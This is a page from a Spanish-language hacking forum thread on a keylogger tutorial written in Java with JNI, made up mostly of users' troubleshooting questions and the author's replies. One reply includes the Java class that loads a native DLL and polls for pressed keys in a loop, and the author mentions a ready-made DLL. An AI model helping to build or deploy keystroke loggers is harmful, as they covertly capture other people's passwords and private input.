elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  Java
| | | |-+  [Tutorial] Keylogger en Java (JNI)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: [Tutorial] Keylogger en Java (JNI)  (Leído 47,213 veces)
Flynker
Wiki

Desconectado Desconectado

Mensajes: 45


Divide y venceras :D


Ver Perfil
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #20 en: 29 Septiembre 2010, 02:12 am »

Por que no anclan este hilo?


En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #21 en: 29 Septiembre 2010, 10:28 am »

Porque como tal no tiene un valor general, por eso esta entre la lista de los mejores posts del foro.

Saludos


En línea

Leyer


Desconectado Desconectado

Mensajes: 786


leyer@elhacker.net


Ver Perfil WWW
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #22 en: 29 Septiembre 2010, 18:09 pm »

Le tuve que hacer una actualización estaba un poco mal hecho :P

un saludo.
En línea

miguelvmonroy

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #23 en: 20 Octubre 2010, 20:51 pm »

 :-[

alguien ya lo tiene ya listo para usarse por que he tratado y me quede en el paso  Paso 1: Creación del Archivo .java
 por que no se como llamar al archivo si keylogger.java

y despues

en donde guardo ese archivo.

despues en el paso 2

javac Keylogger.java
javah -jni Keylogger
al poner esto en la consola de java me sale un error, alguien me podra ayuda.

:(

gracias amigos
En línea

Leyer


Desconectado Desconectado

Mensajes: 786


leyer@elhacker.net


Ver Perfil WWW
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #24 en: 20 Octubre 2010, 23:55 pm »

@miguelvmonroy:

Es por que tienes modificar el path del sistema colocándole la ruta donde tienes el jdk.

De todas formas si te da muchos problemas fíjate que al final coloque la dll ya generada solo tienes que descargarla y usarla.

Un saludo.
« Última modificación: 28 Octubre 2010, 07:44 am por LEYER » En línea

christmo

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #25 en: 26 Octubre 2010, 05:51 am »

Que bien tu tutorial...  ;-)


Se te Felicita sigue así...


Saludos


christmo


En línea

RafelMestre

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #26 en: 14 Septiembre 2011, 13:21 pm »

Hola a todos,
        Estoy haciendo el tutorial del primer post, y tengo una duda al final del tutorial. Una vez he conseguido crear la dll, creo un proyecto con netbeans llamado Keylogger. Una vez esto, en el main copio el main que pusiste al final del tutorial:

public class Keylogger {
   public static void main(String[] args) {
   new Keylogger().start();
   }
}

Después copio la dll creada en la carpeta src de este proyecto donde se encuentra el Keylogger.java.
Y al final cuando compilo el proyecto con el netbeans, me da un error en la linea new Keylogger().start(); donde me dice que no ha encontrado el metodo start.

Alguien me puede ayudar????
Tengo que cambiar algo???

Gracias por la ayuda.
En línea

Leyer


Desconectado Desconectado

Mensajes: 786


leyer@elhacker.net


Ver Perfil WWW
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #27 en: 14 Septiembre 2011, 15:57 pm »

Tienes que colocarle un nombre diferente de la clase de Keylogger

Código
  1. public class MainClass {
  2.   public static void main(String[] args) {
  3.   new Keylogger().start();
  4.   }
  5. }
En línea

RafelMestre

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #28 en: 14 Septiembre 2011, 16:25 pm »

Hola Leyer,
        Me gustaria agregarte a mi msn porque estoy haciendo el proyecto de final de carrera, y necesito utilizar lo de este post; y como tengo varias dudas, me gustaria poder chatear contigo para pedirte varias cosas. Mi email es: ¿¿¿¿¿¿

Gracias.
« Última modificación: 14 Septiembre 2011, 17:40 pm por Leyer » En línea

RafelMestre

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [Tutorial] Keylogger en Java (JNI)
« Respuesta #29 en: 14 Septiembre 2011, 16:40 pm »

Hola leyer,
       Te explico lo que tengo hecho:
1_ He creado la libreria Keylogger.dll
2_ He creado un proyecto con netBeans llamado "Prova"
3_ He copiado la dll en la carpeta C:\...\NetBeansProjects\Prova\src\prova
4_ He creado una classe dentro del proyecto llamada Keylogger, donde he copiado el codigo:

package prova;

public class Keylogger extends Thread {
   private boolean   running=true;
   private int       value =0;
   private native int get();
   static {
      System.loadLibrary("Keylogger");
      /**
       * Carga de la DLL
       */
      }
   @Override
   public synchronized void run(){
         while(running){
            value = get();
            /**
             * Optenemos la Tecla Precionada
             */
            System.out.println((char)value);
            /**
             * La Mostramos en la Salida Estandar
             */
         }
   }
}

5_ Una vez creado, he creado otra classe dentro del paquete llamada "Main", donde he escrito:

package prova;

public class Main {
   public static void main(String[] args) {
   new Keylogger().start();
   }
}

Así es como me queda en el netBeans:


6_ A partir de aquí, compilo con netBeans y no me da ningún error, pero cuando ejecuto, me da el siguiente error:

Exception in thread "Thread-0" java.lang.UnsatisfiedLinkError: prova.Keylogger.get()I
        at prova.Keylogger.get(Native Method)
        at prova.Keylogger.run(Keylogger.java:25)

Qué puedo hacer mal???

Gracias anticipadamente,
Rafel
P.D.: Si me quieres agregar en el hotmail (??????????) te puedo enviar el proyecto para ver si sabes lo que puedo hacer mal.
Adiós!!!!
« Última modificación: 14 Septiembre 2011, 17:40 pm por Leyer » En línea

Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Programar un keylogger en Java
Java
NeoXhk 9 23,348 Último mensaje 11 Noviembre 2009, 00:32 am
por Leyer
Video Tutorial Cracking Perfect Keylogger ultima version
Ingeniería Inversa
nab0s 1 3,699 Último mensaje 4 Julio 2008, 00:13 am
por Shaddy
[TuToRiaL] POO desde 0 en java y C++
Programación General
Dem0ny 5 6,865 Último mensaje 5 Julio 2011, 09:49 am
por darkhermitt
[Tutorial] Twitter + Java
Java
Blitzkrieg' 7 8,770 Último mensaje 4 Julio 2010, 23:43 pm
por Amerikano|Cls
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines